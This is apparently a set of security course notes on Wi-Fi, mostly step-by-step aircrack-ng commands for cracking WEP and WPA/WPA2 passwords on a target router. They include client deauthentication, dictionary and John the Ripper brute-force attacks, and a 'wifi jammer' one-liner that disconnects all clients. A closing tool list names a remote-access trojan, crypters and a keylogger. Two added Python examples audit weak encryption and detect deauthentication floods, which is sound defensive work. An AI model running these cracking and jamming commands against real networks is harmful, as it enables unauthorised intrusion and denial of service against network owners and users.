How Does Wireless Security Work


Why do we need wireless security
Free WiFi –> terrorist connects –> email sent –> innocent user gets punished
Wireless security
—————-
Strong password
–> numbers
–> alphabet
–> lowercase
–> upper case
–> special character
@bh!J33T$!NG#
–> Minimum length –> 8 characters
–> Never share your wifi password
–> Change it frequently
–> Disable WPS
WiFi –> IEEE 802.11 –> Set of rules

WiFi Encryption – Wireless Security

—————
WEP –> RC4
WPA/WPA2 –> DES/AES
DES –> Data Encryption Standard
AES –> Advanced Encryption Standard
Step 1: To start the monitor mode
Step 2: To start gathering information about the wireless signals
Step 3: To start capturing the packets
Step 4: Cracking the WiFi password
Cracking WEP encryption
=======================
> airmon-ng start wlan0
kill the processes that interfere with the wireless card
> airodump-ng wlan0mon
> airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wepcap wlan0mon
--bssid –> router's MAC address
-c –> channel number
-w –> to write/capture packets
> aircrack-ng wepcap-01.cap
Cracking WPA/WPA2
> airmon-ng start wlan0
kill the processes that interfere with the wireless card
> airodump-ng wlan0mon
> airodump-ng --bssid <Target Router's bssid> -c <channel number> -w wepcap wlan0mon
--bssid –> router's MAC address
-c –> channel number
-w –> to write/capture packets
> aireplay-ng -0 10 -a <bssid of router> -c <bssid of user> wlan0mon
-0 –> deauthentication packet
-a –> mac of target router
-c –> mac of any connected client
Dictionary attack
–> rockyou.txt –> /usr/share/wordlist/rockyou.txt
> aircrack-ng filename -w <pathOfDictionary>
Brute Force
–> John the ripper
> john --stdout --incremental | aircrack-ng -e "dlink-FA0C" -w - test001-01.cap
wifi jammer
———–
aireplay-ng -0 0 -a C0:A0:BB:F4:FA:0C -c FF:FF:FF:FF:FF:FF wlan0mon
airmon-ng
———
This script can be used to enable monitor mode on wireless interfaces. It may also be used to go back from monitor mode to managed mode. Entering the airmon-ng command without parameters will show the interfaces status. It can also list/kill programs that can interfere with the wireless card operation.
airodump-ng
———–
airodump-ng is used for packet capturing of raw 802.11 frames for the intent of using them with aircrack-ng. If you have a GPS receiver connected to the computer, airodump-ng is capable of logging the coordinates of the found access points. Additionally, airodump-ng writes out a text file containing the details of all access points and clients seen.

       Beacons
              Number of beacons sent by the AP. Each access point sends about ten beacons per second
              at the lowest rate (1M), so they can usually be picked up from very far.
       #Data  Number of captured data packets (if WEP, unique IV count), including data broadcast
              packets.
       #/s    Number of data packets per second measured over the last 10 seconds.
       CH     Channel number (taken from beacon packets). Note: sometimes packets from other channels
              are captured even if airodump-ng is not hopping, because of radio interference.
       MB     Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+
              and higher rates are 802.11g. The dot (after 54 above) indicates short preamble is
              supported. 'e' indicates that the network has QoS (802.11e) enabled.
       ENC    Encryption algorithm in use. OPN = no encryption, "WEP?" = WEP or higher (not enough
              data to choose between WEP and WPA/WPA2), WEP (without the question mark) indicates
              static or dynamic WEP, and WPA or WPA2 if TKIP or CCMP or MGT is present.
       CIPHER The cipher detected. One of CCMP, WRAP, TKIP, WEP, WEP40, or WEP104. Not mandatory,
              but TKIP is typically used with WPA and CCMP is typically used with WPA2. WEP40 is
              displayed when the key index is greater than 0. The standard states that the index can
              be 0-3 for 40bit and should be 0 for 104 bit.
       AUTH   The authentication protocol used. One of MGT (WPA/WPA2 using a separate authentication
              server), SKA (shared key for WEP), PSK (pre-shared key for WPA/WPA2), or OPN (open for
              WEP).
       WPS    This is only displayed when --wps (or -W) is specified. If the AP supports WPS, the
              first field of the column indicates version supported. The second field indicates WPS
              config methods (can be more than one method, separated by comma): USB = USB method,
              ETHER = Ethernet, LAB = Label, DISP = Display, EXTNFC = External NFC, INTNFC = Internal
              NFC, NFCINTF = NFC Interface, PBC = Push Button, KPAD = Keypad. Locked is displayed
              when AP setup is locked.
       ESSID  The so-called "SSID", which can be empty if SSID hiding is activated. In this case,
              airodump-ng will try to recover the SSID from probe responses and association
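The ENC, CIPHER and AUTH fields above are what a defender reads when auditing their own access points. The following is an added example, not part of the original notes: it parses the access-point table of the text file airodump-ng writes and reports weak settings. The column names follow airodump-ng's CSV layout as an assumption, and every BSSID and ESSID in the sample is constructed.

```python
import csv
import io

# Constructed sample in the layout of an airodump-ng CSV file: an access-point
# table, a blank line, then a station table. All addresses and names are made up.
SAMPLE_CSV = """\
BSSID, First time seen, Last time seen, channel, Speed, Privacy, Cipher, Authentication, Power, # beacons, # IV, LAN IP, ID-length, ESSID, Key
02:00:00:00:00:01, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  6,  54, WEP, WEP, , -48, 120, 300,   0.  0.  0.  0,  9, lab-wep-1,
02:00:00:00:00:02, 2024-01-01 10:00:00, 2024-01-01 10:05:00, 11, 130, WPA2 WPA, CCMP TKIP, PSK, -55, 110, 0,   0.  0.  0.  0,  9, lab-mixed,
02:00:00:00:00:03, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1, 130, WPA2, CCMP, PSK, -60, 100, 0,   0.  0.  0.  0,  8, lab-wpa2,
02:00:00:00:00:04, 2024-01-01 10:00:00, 2024-01-01 10:05:00,  1,  54, OPN, , , -70, 90, 0,   0.  0.  0.  0,  8, lab-open,

Station MAC, First time seen, Last time seen, Power, # packets, BSSID, Probed ESSIDs
02:00:00:00:00:AA, 2024-01-01 10:01:00, 2024-01-01 10:04:00, -40, 25, 02:00:00:00:00:03,
"""

def audit(csv_text):
    """Map ESSID -> list of weak settings found in the access-point table."""
    report, header = {}, None
    for row in csv.reader(io.StringIO(csv_text), skipinitialspace=True):
        row = [cell.strip() for cell in row]
        if not any(row):
            if header:
                break              # blank line: AP table ended, stations follow
            continue
        if row[0] == "BSSID":
            header = row           # column names for the AP table
            continue
        if header is None:
            continue
        ap = dict(zip(header, row))
        privacy = ap.get("Privacy", "").split()
        cipher = ap.get("Cipher", "").split()
        issues = []
        if "OPN" in privacy:
            issues.append("open network, traffic is unencrypted")
        if any(p.startswith("WEP") for p in privacy):
            issues.append("WEP (RC4) in use")
        if "WPA" in privacy:
            issues.append("legacy WPA still offered")
        if "TKIP" in cipher:
            issues.append("TKIP cipher enabled, use CCMP only")
        if issues:
            report[ap.get("ESSID") or ap["BSSID"]] = issues
    return report

if __name__ == "__main__":
    for essid, issues in audit(SAMPLE_CSV).items():
        print(f"{essid}: {'; '.join(issues)}")
```

An ESSID that itself contains a comma shifts the columns of its row, so treat such rows as needing manual review.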
aircrack-ng
———–
aircrack-ng is an 802.11 WEP and WPA/WPA2-PSK key cracking program.
It can recover the WEP key once enough encrypted packets have been captured with airodump-ng. This part of the aircrack-ng suite determines the WEP key using two fundamental methods. The first method is via the PTW approach (Pyshkin, Tews, Weinmann). The main advantage of the PTW approach is that very few data packets are required to crack the WEP key. The second method is the FMS/KoreK method. The FMS/KoreK method incorporates various statistical attacks to discover the WEP key and uses these in combination with brute forcing.
Additionally, the program offers a dictionary method for determining the WEP key. For cracking WPA/WPA2 pre-shared keys, a wordlist (file or stdin) or an airolib-ng has to be used.
aireplay-ng
———–
aireplay-ng is used to inject/replay frames. The primary function is to generate traffic for the later use in aircrack-ng for cracking the WEP and WPA-PSK keys. There are different attacks which can cause deauthentications for the purpose of capturing WPA handshake data, fake authentications, Interactive packet replay, hand-crafted ARP request injection and ARP-request reinjection. With the packetforge-ng tool it's possible to create arbitrary frames.
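The deauthentication frames described above are visible to anyone monitoring the channel, which makes them detectable. The following is an added example, not part of the original notes: it flags a burst of deauthentication frames per BSSID within a sliding time window. The record format, window and threshold are assumptions, and the sample frames are constructed.

```python
from collections import defaultdict, deque

BROADCAST = "ff:ff:ff:ff:ff:ff"
DEAUTH = 0x0C   # 802.11 management frame subtype 12 = deauthentication

def detect_deauth_floods(frames, window=1.0, threshold=10):
    """frames: time-sorted (timestamp_s, subtype, bssid, destination) tuples.
    Returns one alert dict per burst of >= threshold deauths inside window."""
    recent = defaultdict(deque)   # bssid -> (timestamp, destination) in window
    active = {}                   # bssid -> alert that is still being extended
    alerts = []
    for ts, subtype, bssid, dst in frames:
        if subtype != DEAUTH:
            continue
        q = recent[bssid]
        q.append((ts, dst.lower()))
        while ts - q[0][0] > window:
            q.popleft()           # drop frames that fell out of the window
        if len(q) < threshold:
            active.pop(bssid, None)   # rate dropped, burst is over
            continue
        alert = active.get(bssid)
        if alert is None:
            alert = {"bssid": bssid, "start": q[0][0], "frames": len(q),
                     "broadcast": any(d == BROADCAST for _, d in q)}
            active[bssid] = alert
            alerts.append(alert)
        else:
            alert["frames"] += 1
            alert["broadcast"] |= dst.lower() == BROADCAST
        alert["end"] = ts
    return alerts

def sample_frames():
    """Constructed capture summary; all addresses are made up."""
    ap1, ap2 = "02:00:00:00:00:01", "02:00:00:00:00:02"
    frames = [(0.5, 0x08, ap1, BROADCAST),               # beacon, ignored
              (2.0, DEAUTH, ap1, "02:00:00:00:00:aa"),    # a client leaving
              (9.0, DEAUTH, ap1, "02:00:00:00:00:ab")]    # another, much later
    frames += [(20.0 + i * 0.01, DEAUTH, ap2, BROADCAST) for i in range(40)]
    return sorted(frames)

if __name__ == "__main__":
    for a in detect_deauth_floods(sample_frames()):
        print(a)
```

An alert with `broadcast` set means every client of that BSSID is being disconnected at once; requiring 802.11w protected management frames on the network makes clients ignore forged deauthentication frames.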

Skills – Wireless Security

——
Bypassing OS Login
System Protection/PT
Malware Protection
Information Gathering
Social Engineering
Email Security
OWASP TOP 10
VA
Wireless Protection
Traffic Monitoring
Mobile Platform Security/PT
WiFi Security/PT

Tools – Wireless Security

anonymox
psiphon
hotspot shield
ultrasurf
hiren boot cd
kon boot cd
whoislookup
dnslookup
maltego
dark comet
urge cryptor
chrome cryptor
family key logger
syskey
angry ip scanner
xampp server
dvwa
sqlmap
havij
burp suite
mod security
netsparker
acunetix
zap
IBM app scanner
ettercap
xerosploit
bettercap
honeypot
driftnet
urlsnarf
sslstrip
netdiscover
airmon-ng
airodump-ng
aireplay-ng
aircrack-ng
john the ripper
